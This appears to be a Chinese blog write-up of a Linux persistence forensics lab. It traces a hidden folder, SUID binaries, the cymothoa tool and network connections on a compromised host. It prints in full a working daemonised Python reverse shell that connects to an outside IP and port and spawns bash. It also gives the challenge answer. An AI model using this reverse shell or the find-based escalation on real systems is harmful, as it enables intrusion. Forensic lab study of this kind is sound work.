Looking for light.

Archive

About

Xiaodi

玄机——Linux权限维持

首先查找隐藏文件信息。容易在tmp文件夹下找到一个隐藏的.temp文件夹,在其中有1.pyshell.py文件。查看1.py文件,可以得到黑客反弹shell的IP与对应端口。

root@xuanji:/tmp/.temp/libprocesshider# cat 1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)

接下来我们需要知道黑客使用什么命令提权的。渗透思路一般是sudo -l或find查找特权文件。没有办法切换到黑客登陆的身份,我们只能find查找特权文件。

root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

很明显对方用find提的权。接下来我们需要找到对方的恶意工具位置,翻到opt文件夹是发现有隐藏文件夹,看名字易知此即为恶意工具

root@xuanji:/opt/.cymothoa-1-beta# ls -al
total 580
drwxr-xr-x. 3 ctf  1000  16384 Aug  3  2023 .
drwxr-xr-x. 1 root root     30 Aug  3  2023 ..
-rw-r--r--. 1 ctf  1000    137 May 24  2011 Makefile
-rwxr-xr-x. 1 root root  13714 Aug  3  2023 bgrep
-rw-r--r--. 1 root root   4357 May  5  2011 bgrep.c
-rw-------. 1 root root 421888 Aug  3  2023 core
-rwxr-xr-x. 1 root root  30569 Aug  3  2023 cymothoa
-rw-r--r--. 1 ctf  1000  11348 Jul 27  2011 cymothoa.c
-rw-r--r--. 1 ctf  1000   5009 Jul 27  2011 cymothoa.h
-rwxr-xr-x. 1 root root   1229 May  5  2011 hexdump_to_cstring.pl
drwxr-xr-x. 2 root root  16384 Jul 27  2011 payloads
-rw-r--r--. 1 ctf  1000  15822 Jul 27  2011 payloads.h
-rw-r--r--. 1 ctf  1000   5011 May 24  2011 personalization.h
-rwxr-xr-x. 1 root root    964 May 24  2011 syscall_code.pl
-rw-r--r--. 1 root root   4995 May 24  2011 syscalls.txt
-rwxr-xr-x. 1 root root   9181 Aug  3  2023 udp_server
-rw-r--r--. 1 root root   1345 May 24  2011 udp_server.c

最后我们需要得到使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交

不是很理解此话的意思,看WP意思是让我们运行1.py后去查看运行的python进程叫什么。

root@xuanji:/tmp/.temp/libprocesshider# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.244.21.32:22         10.244.0.1:49926        ESTABLISHED keepalive (6579.54/0/0)
tcp        0      1 10.244.21.32:58942      114.114.114.121:9999    SYN_SENT    on (2.51/2/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ACC ]     STREAM     LISTENING     1681395351 /var/run/mysqld/mysqld.sock
unix  2      [ ACC ]     STREAM     LISTENING     1681395011 /tmp/supervisor.sock.1
root@xuanji:/tmp/.temp/libprocesshider# ls -al /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4

故最后一题答案为/usr/bin/python3.4